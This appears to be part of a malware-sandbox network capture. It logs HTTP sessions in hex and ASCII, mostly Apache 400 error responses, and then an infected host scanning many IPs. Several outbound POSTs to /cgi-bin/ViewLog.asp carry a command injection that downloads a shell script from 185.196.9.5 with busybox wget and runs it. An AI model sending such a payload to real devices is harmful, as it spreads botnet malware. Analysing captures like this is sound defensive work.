75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:03:58.140059948 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:55 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:00.350609064 CET	536	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:55 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></
Feb 25, 2024 19:04:02.571832895 CET	536	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:55 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></
Feb 25, 2024 19:04:04.793998003 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:55 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:09.218086958 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:55 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:18.052588940 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:55 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
575	192.168.2.15	55536	31.136.223.199	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:55.744123936 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:58.949656010 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:05.093631983 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:17.125583887 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:42.469230890 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:31.620779991 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
576	192.168.2.15	52968	94.224.221.14	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:55.748986006 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
577	192.168.2.15	51332	85.214.240.205	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:55.749105930 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
578	192.168.2.15	51948	62.29.60.50	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:55.779028893 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
579	192.168.2.15	41216	85.26.215.165	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:55.820719004 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:56.086447954 CET	711	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Sun, 25 Feb 2024 18:03:55 GMT Content-Type: text/html; charset=utf-8 Content-Length: 150 Connection: keep-alive X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src * data: blob: ws: wss: gap://ready file://; style-src 'unsafe-inline'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * ws: wss:; Strict-Transport-Security: max-age=31536000; includeSubDomains Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
580	192.168.2.15	49268	31.220.96.172	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:55.838027954 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
581	192.168.2.15	47948	31.136.199.40	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:55.923894882 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:56.485766888 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:57.637661934 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
